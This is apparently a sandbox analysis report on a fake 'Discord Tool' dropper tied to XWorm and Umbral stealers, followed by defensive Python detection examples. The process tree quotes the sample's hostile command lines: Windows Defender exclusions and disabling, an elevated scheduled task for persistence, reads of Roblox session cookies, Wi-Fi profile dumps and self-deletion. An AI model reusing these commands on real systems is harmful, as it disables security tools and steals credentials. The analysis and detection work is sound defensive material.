Resubmissions
13-07-2024 23:41  240713-3pr3vstcrb  (score 10)

Analysis
max time kernel: 84s
max time network: 87s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-07-2024 23:41
Behavioral task: behavioral1
Sample: Discord Tool v.7.7.exe
Resource: win10v2004-20240709-en

General
Target: Discord Tool v.7.7.exe
Size: 65KB
MD5: 5ff4a7e0fefe94b3bbf86f2137577ff2
SHA1: 67d9e82ef85881813228e902fd7880e0ceba20b9
SHA256: a562d44e4bf6ec4f8a15c420bc3343f56011b2b454862869e01471075cba1a7e
SHA512: 05edf0d3bc2da186f6a159ef6e5c6f0456fc0979e188c8e8cb62799e0c663515dd9d4aaf631ac8f7830934a618e6eca5fd94e0e1d39d14ee9fbf68e97e8319a4
SSDEEP: 768:kRwwGkRrFpObTMFIiVZTKb9hFrTbpkLZ9WBf6Owg5+OWhXBZ5/HA:kRxGW5kbTqgTbpm9g6jk+OWRxHA
Malware Config
Extracted family: xworm
C2: original-preston.gl.at.ply.gg:51307 (a playit.gg tunnel hostname, so the operator's real endpoint sits behind the tunnel service rather than at a directly attributable address)
Install_directory: %AppData%
install_file: XClient.exe
Signatures

Detect Umbral payload (2 IoCs)
YARA rule family_umbral matched:
- behavioral1/files/0x00080000000234dd-63.dat
- behavioral1/memory/536-70-0x0000016AB3540000-0x0000016AB3586000-memory.dmp

Detect Xworm Payload (2 IoCs)
YARA rule family_xworm matched:
- behavioral1/memory/4720-1-0x0000000000E80000-0x0000000000E96000-memory.dmp
- behavioral1/files/0x000700000001e7c5-243.dat
Command and Scripting Interpreter: PowerShell (1 TTP, 6 IoCs)
Runs PowerShell (Add-MpPreference) to add Windows Defender exclusions. In this run the exclusions cover paths and processes: the dropper itself, the two dropped stealer binaries, and the XClient.exe install path. The separate Set-MpPreference calls that attempt to disable real-time monitoring, IOAV, script scanning and sample submission (pids 5008 and 3104 in the process tree) are not counted under this signature.
- 1516 powershell.exe
- 1152 powershell.exe
- 1224 powershell.exe
- 2824 powershell.exe
- 3064 powershell.exe
- 4988 powershell.exe
Drops file in Drivers directory (2 IoCs)
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (mwjbna.exe)
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (ypjjxu.exe)

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
- Key value queried: \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation (Discord Tool v.7.7.exe)

Drops startup file (2 IoCs)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk (Discord Tool v.7.7.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk (Discord Tool v.7.7.exe)

Executes dropped EXE (3 IoCs)
- 536 mwjbna.exe
- 4576 ypjjxu.exe
- 2820 XClient.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
- flow 52: discord.com
- flow 43: discord.com
- flow 44: discord.com
- flow 51: discord.com

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 19: ip-api.com
- flow 48: ip-api.com
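The ip-api.com lookups and the discord.com flows listed above, together with the tunnelled C2 host in the Malware Config, are the network side of this run. As an added example (not part of the report), the Python below correlates them over constructed flow records: it flags traffic to the configured C2 or to any other *.ply.gg tunnel hostname, and the lookup-then-webhook sequence (ip-api.com followed within 60 seconds by discord.com from the same source). Source addresses, timestamps, ports and the Flow record layout are all assumptions; the report itself lists only flow ids and destination names.

```python
"""Correlate this report's network IoCs over constructed flow records.

Added example, not code from the sandbox or the sample. The Flow layout,
source addresses, ports and timestamps are assumptions; the C2 host and
the destination names come from the report.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

C2_HOST, C2_PORT = "original-preston.gl.at.ply.gg", 51307   # extracted xworm config
TUNNEL_SUFFIXES = (".ply.gg",)                                # playit.gg tunnel hostnames
IP_LOOKUP_HOSTS = {"ip-api.com"}                              # "Looks up external IP address"
WEBHOOK_HOSTS = {"discord.com"}                               # "Legitimate hosting services abused"


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    dst_host: str
    dst_port: int


def correlate(flows, window=timedelta(seconds=60)):
    """Return (rule, src, timestamp, detail) tuples, grouped by source address."""
    by_src = defaultdict(list)
    for f in sorted(flows, key=lambda f: f.ts):
        by_src[f.src].append(f)

    alerts = []
    for src, fl in by_src.items():
        for f in fl:
            if (f.dst_host, f.dst_port) == (C2_HOST, C2_PORT):
                alerts.append(("xworm_c2", src, f.ts, f"{f.dst_host}:{f.dst_port}"))
            elif f.dst_host.endswith(TUNNEL_SUFFIXES):
                alerts.append(("tunnel_hostname", src, f.ts, f.dst_host))
        # One alert per lookup that is followed by a discord.com flow inside the window.
        # A lookup alone (many legitimate tools do it) or discord.com alone (a chat client)
        # does not fire; the order and proximity are what make the pattern a stealer's.
        for lk in (f for f in fl if f.dst_host in IP_LOOKUP_HOSTS):
            hits = [g for g in fl if g.dst_host in WEBHOOK_HOSTS and lk.ts <= g.ts <= lk.ts + window]
            if hits:
                alerts.append(("ip_lookup_then_webhook", src, lk.ts,
                               f"{len(hits)} discord.com flow(s) within {window.seconds}s"))
    return alerts


T0 = datetime(2024, 7, 13, 23, 42, 0)


def s(n):
    return T0 + timedelta(seconds=n)


# Constructed flows: 10.0.0.5 replays the report's sequence (two ip-api.com lookups,
# discord.com posts, then the C2 on 51307); the other two hosts are benign controls.
FLOWS = [
    Flow(s(0), "10.0.0.5", "ip-api.com", 80),
    Flow(s(5), "10.0.0.5", "discord.com", 443),
    Flow(s(6), "10.0.0.5", "discord.com", 443),
    Flow(s(40), "10.0.0.5", "ip-api.com", 80),
    Flow(s(45), "10.0.0.5", "discord.com", 443),
    Flow(s(50), "10.0.0.5", C2_HOST, C2_PORT),
    Flow(s(2), "10.0.0.7", "discord.com", 443),   # chat client, no lookup: no alert
    Flow(s(3), "10.0.0.9", "ip-api.com", 80),     # lookup only: no alert
    Flow(s(90), "10.0.0.9", "discord.com", 443),  # 87 s later, outside the window
]

if __name__ == "__main__":
    for rule, src, ts, detail in correlate(FLOWS):
        print(f"{ts:%H:%M:%S} {src:<10} {rule:<24} {detail}")
```

The C2 match is exact (host and port) because that is what the config gives; the *.ply.gg suffix match is broader and will also catch other tenants of the same tunnel provider, so treat it as a lead rather than a verdict.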
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
- Key opened: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
Caveat: the only netsh invocation in this run is "netsh wlan show profiles" (Wi-Fi profile enumeration, see the process tree), and the NetSh key is only opened, queried and enumerated, never written. That registry access is netsh loading its own helper DLLs; nothing in the report shows the sample registering a helper DLL, so the behaviour to act on is the Wi-Fi profile dump, not this persistence technique.

Detects videocard installed (1 TTP, 2 IoCs)
Uses WMIC.exe to determine the installed video card.
- 4772 wmic.exe
- 4856 wmic.exe

Runs ping.exe (1 TTP, 2 IoCs)
- 452 PING.EXE
- 4140 PING.EXE

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- 4436 schtasks.exe
Suspicious behavior: EnumeratesProcesses (31 IoCs; ×2 marks a pid recorded twice)
- 1152 powershell.exe (×2)
- 1224 powershell.exe (×2)
- 2824 powershell.exe (×2)
- 3064 powershell.exe (×2)
- 4720 Discord Tool v.7.7.exe
- 536 mwjbna.exe
- 4988 powershell.exe (×2)
- 5008 powershell.exe (×2)
- 4380 powershell.exe (×2)
- 3512 powershell.exe (×2)
- 4736 powershell.exe (×2)
- 4576 ypjjxu.exe
- 1516 powershell.exe (×2)
- 3104 powershell.exe (×2)
- 3788 powershell.exe (×2)
- 5072 powershell.exe (×2)
- 1652 powershell.exe (×2)
Suspicious use of AdjustPrivilegeToken (64 IoCs, in event order)
- SeDebugPrivilege: 4720 Discord Tool v.7.7.exe, 1152 powershell.exe, 1224 powershell.exe, 2824 powershell.exe, 3064 powershell.exe, 4720 Discord Tool v.7.7.exe, 536 mwjbna.exe
- 2276 wmic.exe, the same 21 privileges enabled twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- SeDebugPrivilege: 4988 powershell.exe, 5008 powershell.exe, 4380 powershell.exe, 3512 powershell.exe
- 3920 wmic.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege (the report lists 64 entries and stops here)
Suspicious use of SetWindowsHookEx (1 IoC)
- 4720 Discord Tool v.7.7.exe
Suspicious use of WriteProcessMemory (64 IoCs; every write is recorded twice in the report, procid_target in brackets)
- 4720 Discord Tool v.7.7.exe wrote to: 1152 [88], 1224 [90], 2824 [92], 3064 [94], 4436 [96], 536 [100], 4576 [125]
- 536 mwjbna.exe wrote to: 2276 [101], 4252 [103], 4988 [105], 5008 [107], 4380 [109], 3512 [111], 3920 [113], 2432 [115], 1224 [117], 4736 [119], 4772 [121], 736 [123]
- 736 cmd.exe wrote to: 452 [126]
- 4576 ypjjxu.exe wrote to: 1888 [127], 2132 [129], 1516 [131], 3104 [133], 3788 [135], 5072 [137], 2064 [139], 4168 [141], 2920 [143], 1652 [145], 4856 [147], 1368 [149]
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTP, 2 IoCs)
Both calls set +h +s on the dropped stealer binaries so they are hidden from a default Explorer view (see the process tree).
- 4252 attrib.exe
- 2132 attrib.exe
Processes (indentation shows parent/child depth; tags are the signatures attributed to each process)

PID 4720  C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe
  cmd:  "C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe"
  tags: Checks computer location settings; Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

  PID 1152  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe'
    tags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  PID 1224  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord Tool v.7.7.exe'
    tags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  PID 2824  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
    tags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  PID 3064  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    tags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  PID 4436  C:\Windows\System32\schtasks.exe
    cmd:  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
    tags: Scheduled Task/Job: Scheduled Task
    note: an elevated task (/RL HIGHEST) that re-runs a binary in the user's %AppData% every minute; together with the Startup-folder XClient.lnk this is XWorm's persistence.

  PID 536  C:\Users\Admin\AppData\Local\Temp\mwjbna.exe
    cmd:  "C:\Users\Admin\AppData\Local\Temp\mwjbna.exe"
    tags: Drops file in Drivers directory; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    PID 2276  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic.exe" csproduct get uuid
      tags: Suspicious use of AdjustPrivilegeToken

    PID 4252  C:\Windows\SYSTEM32\attrib.exe
      cmd:  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\mwjbna.exe"
      tags: Views/modifies file attributes

    PID 4988  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mwjbna.exe'
      tags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    PID 5008  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      tags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      note: Windows PowerShell 5.1, the version on this image, does not accept "&&" as a statement separator, so this command line fails to parse as a whole and none of the Set-MpPreference changes on it are applied. Treat it as attempted, not confirmed, Defender tampering.

    PID 4380  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      tags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    PID 3512  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY   (sic: "HKLN" is what the observed command line contains)
      tags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    PID 3920  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic.exe" os get Caption
      tags: Suspicious use of AdjustPrivilegeToken

    PID 2432  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic.exe" computersystem get totalphysicalmemory
      tags: none

    PID 1224  C:\Windows\System32\Wbem\wmic.exe   (PID reused; the earlier powershell.exe 1224 had exited)
      cmd:  "wmic.exe" csproduct get uuid
      tags: none

    PID 4736  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      tags: Suspicious behavior: EnumeratesProcesses

    PID 4772  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic" path win32_VideoController get name
      tags: Detects videocard installed

    PID 736  C:\Windows\SYSTEM32\cmd.exe
      cmd:  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\mwjbna.exe" && pause
      tags: Suspicious use of WriteProcessMemory
      note: self-deletion of the parent stealer; the ping is only a delay so that mwjbna.exe can exit before its hidden (+h) file is removed.

      PID 452  C:\Windows\system32\PING.EXE
        cmd:  ping localhost
        tags: Runs ping.exe

  PID 4576  C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe
    cmd:  "C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe"
    tags: Drops file in Drivers directory; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

    PID 1888  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic.exe" csproduct get uuid
      tags: none

    PID 2132  C:\Windows\SYSTEM32\attrib.exe
      cmd:  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe"
      tags: Views/modifies file attributes

    PID 1516  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe'
      tags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses

    PID 3104  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      tags: Suspicious behavior: EnumeratesProcesses
      note: same "&&" parse failure as PID 5008.

    PID 3788  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      tags: Suspicious behavior: EnumeratesProcesses

    PID 5072  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY   (sic, as for PID 3512)
      tags: Suspicious behavior: EnumeratesProcesses

    PID 2064  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic.exe" os get Caption
      tags: none

    PID 4168  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic.exe" computersystem get totalphysicalmemory
      tags: none

    PID 2920  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic.exe" csproduct get uuid
      tags: none

    PID 1652  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd:  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      tags: Suspicious behavior: EnumeratesProcesses

    PID 4856  C:\Windows\System32\Wbem\wmic.exe
      cmd:  "wmic" path win32_VideoController get name
      tags: Detects videocard installed

    PID 1368  C:\Windows\SYSTEM32\cmd.exe
      cmd:  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe" && pause
      tags: none

      PID 4140  C:\Windows\system32\PING.EXE
        cmd:  ping localhost
        tags: Runs ping.exe

  PID 4136  C:\Windows\SYSTEM32\cmd.exe
    cmd:  "cmd"
    tags: none

    PID 3832  C:\Windows\system32\netsh.exe
      cmd:  netsh wlan show profiles
      tags: Event Triggered Execution: Netsh Helper DLL

PID 2820  C:\Users\Admin\AppData\Roaming\XClient.exe
  cmd:  C:\Users\Admin\AppData\Roaming\XClient.exe
  tags: Executes dropped EXE
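The Defender tampering, the one-minute elevated scheduled task, the ping-then-del self-deletion, the Wi-Fi profile dump and the .ROBLOSECURITY registry read are all visible in the command lines above, which makes them good material for process-creation triage rules. The Python below is an added example, not code from the sandbox or from the sample: it runs such rules over a constructed event list whose malicious command lines are copied from this process tree. The event dict layout (pid/ppid/image/cmdline), the rule names and the benign control event are assumptions.

```python
"""Process-creation triage rules, run over command lines from this report.

Added example, not code from the sandbox or the sample. Event layout
(pid/ppid/image/cmdline), rule names and the benign control event are
assumptions; the malicious command lines are copied from the process tree.
"""
import re

EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+'([^']+)'", re.I)
DISABLE_RE = re.compile(r"-Disable(RealtimeMonitoring|IOAVProtection|ScriptScanning|IntrusionPreventionSystem)\s+\$true", re.I)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*\s/create\b", re.I)
SCHTASKS_OPT_RE = re.compile(r'/(?P<key>tn|tr|sc|mo|rl)\s+(?:"(?P<q>[^"]*)"|(?P<u>\S+))', re.I)
# ping <host> && del ... "<file>": the ping is a sleep so the parent can exit before its file is deleted
SELF_DELETE_RE = re.compile(r'\bping\s+\S+\s*&&\s*del\b[^"]*"(?P<target>[^"]+)"', re.I)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def _finding(event, rule, detail):
    return {"pid": event["pid"], "image": event["image"].rsplit("\\", 1)[-1], "rule": rule, "detail": detail}


def triage(events):
    """Apply every rule to every event and return the findings in event order."""
    by_pid = {e["pid"]: e for e in events}  # parent lookup for the self-delete check
    findings = []
    for e in events:
        cmd = e["cmdline"]
        # Defender exclusions: record what was excluded, not just that it happened
        for kind, value in EXCLUSION_RE.findall(cmd):
            findings.append(_finding(e, "defender_exclusion", f"{kind}={value}"))
        disabled = DISABLE_RE.findall(cmd)
        if "Set-MpPreference" in cmd and disabled:
            findings.append(_finding(e, "defender_disable", ",".join(disabled)))
        # schtasks persistence: parse the switches and say why the task is suspicious
        if SCHTASKS_CREATE_RE.search(cmd):
            opts = {m["key"].lower(): (m["q"] if m["q"] is not None else m["u"])
                    for m in SCHTASKS_OPT_RE.finditer(cmd)}
            reasons = []
            if opts.get("rl", "").upper() == "HIGHEST":
                reasons.append("runs elevated")
            if opts.get("sc", "").lower() == "minute":
                reasons.append(f"fires every {opts.get('mo', '1')} minute(s)")
            if any(seg in opts.get("tr", "").lower() for seg in USER_WRITABLE):
                reasons.append("action lives in a user-writable path")
            if reasons:
                findings.append(_finding(e, "schtasks_persistence",
                                         f"tn={opts.get('tn')} tr={opts.get('tr')} ({'; '.join(reasons)})"))
        # self-deletion: the file being deleted is the parent process's own image
        m = SELF_DELETE_RE.search(cmd)
        if m:
            parent = by_pid.get(e["ppid"])
            target = m["target"]
            is_self = parent is not None and parent["image"].lower() == target.lower()
            findings.append(_finding(e, "self_delete" if is_self else "delayed_delete", target))
        if re.search(r"\bnetsh\b.*\bwlan\s+show\s+profiles?\b", cmd, re.I):
            findings.append(_finding(e, "wifi_profile_enum", cmd))
        if ".ROBLOSECURITY" in cmd:
            findings.append(_finding(e, "roblox_cookie_read", cmd.split("-Path", 1)[-1].strip()))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed from the report's process tree; pid/ppid as reported
    {"pid": 4720, "ppid": 0, "image": r"C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe"'},
    {"pid": 1152, "ppid": 4720, "image": PS,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
                r"Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe'"},
    {"pid": 3064, "ppid": 4720, "image": PS,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
                r"Add-MpPreference -ExclusionProcess 'XClient.exe'"},
    {"pid": 4436, "ppid": 4720, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" '
                r'/tr "C:\Users\Admin\AppData\Roaming\XClient.exe"'},
    {"pid": 536, "ppid": 4720, "image": r"C:\Users\Admin\AppData\Local\Temp\mwjbna.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\mwjbna.exe"'},
    {"pid": 5008, "ppid": 536, "image": PS,
     "cmdline": r'"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true '
                r"-DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
                r"-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend "
                r"&& powershell Set-MpPreference -SubmitSamplesConsent 2"},
    {"pid": 4380, "ppid": 536, "image": PS,
     "cmdline": r'"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY'},
    {"pid": 736, "ppid": 536, "image": r"C:\Windows\SYSTEM32\cmd.exe",
     "cmdline": r'"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\mwjbna.exe" && pause'},
    {"pid": 3832, "ppid": 4136, "image": r"C:\Windows\system32\netsh.exe", "cmdline": "netsh wlan show profiles"},
    {"pid": 9001, "ppid": 4, "image": PS, "cmdline": '"powershell.exe" Get-Process'},  # benign control: no finding
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f['pid']:>5} {f['image']:<24} {f['rule']:<22} {f['detail']}")
```

The rules fire on what was attempted: a defender_disable hit says a process tried to turn real-time protection off, and whether that succeeded has to be confirmed from Defender's own operational event log on the host. The schtasks rule keeps the parsed task name and action so the responder can remove the right task, which is the piece of context a bare "schtasks /create seen" alert leaves out.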
MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)

Persistence
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads (file hashes as listed in the report; no file names are given)

Filesize: 2KB
MD5: 750e4be22a6fdadd7778a388198a9ee3
SHA1: 8feb2054d8a3767833dd972535df54f0c3ab6648
SHA256: 26209c196c9c45202d27468ea707b2b46f375bb612d50271924a28f9210df6a1
SHA512: b0415087dfc32908b449b876b395a607698b0f7b72031916b6fe7c002e4b163ba318b7e85c8ce41f007429e666974c04967bc14345e3f4614e34d94f5c8ae804

Filesize: 948B
MD5: ba42012e626d8c04b25c5e8bcb49d58e
SHA1: 4f542888067e87d2d4dd8ced7bc901abd60f819b
SHA256: 0a3c73d3b3afc81747d415241a047a1cadd117a0536606b89e57ecf8836e40ff
SHA512: 6678e24f430379c3c2ec0385fc02d0db9a65720072b57e4b36f23be65c82b4d3da2692e1bf0d575bdd59d5673fa1b64ab99d1881367af632bb89121b1981fe11

Filesize: 1KB
MD5: 6345996dd8d19b416cbb0644e896864a
SHA1: 70b553a603fdee1e2300b4b9855a6d691da6d201
SHA256: 84c7485a1486ac110f581d143f84708c8b6bf5cffaf04d4c870001e107ce007a
SHA512: 2b349aed2b54ca9d212036a8a97b16d5b5bae4e42daf9a4b142685382d44af438bc72e725c586318854096dd744372240dd24e526580b432afc055b3b74c1cd0

Filesize: 1KB
MD5: 45ad40f012b09e141955482368549640
SHA1: 3f9cd15875c1e397c3b2b5592805577ae88a96cb
SHA256: ea3b59172f1a33677f9cb3843fb4d6093b806d3a7cf2f3c6d4692f5421f656ce
SHA512: 3de08f8affca1c1450088f560776cf3d65146cadac43c06eb922c7b3cea436e519966cf38458303ffeb1a58c53f8952cffda6c34216fda7594e014b516e83b33

Filesize: 64B
MD5: b68ab4ca7e39baffff644d4820c98f0c
SHA1: 25aee3c71f29c4520c9a89a13ce47864b75ced4e
SHA256: 974a01642047984dcc7429b685decc35b22bfb88926f25174f77721f4afaf676
SHA512: 5c96c46ba870ced22f9956ecec737fe2a6d4d73a52a1db323b29a82324f3fbd298ecb0a79ce55828bcb9e813b64815bae137d480f26e9d69f6cf7830dfd4ab9d

Filesize: 944B
MD5: 96ff1ee586a153b4e7ce8661cabc0442
SHA1: 140d4ff1840cb40601489f3826954386af612136
SHA256: 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512: 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Filesize: 948B
MD5: c65738617888921a153bd9b1ef516ee7
SHA1: 5245e71ea3c181d76320c857b639272ac9e079b1
SHA256: 4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26
SHA512: 2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

Filesize: 1KB
MD5: 227556da5e65f6819f477756808c17e4
SHA1: 6ffce766e881ca2a60180bb25f4981b183f78279
SHA256: 101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4
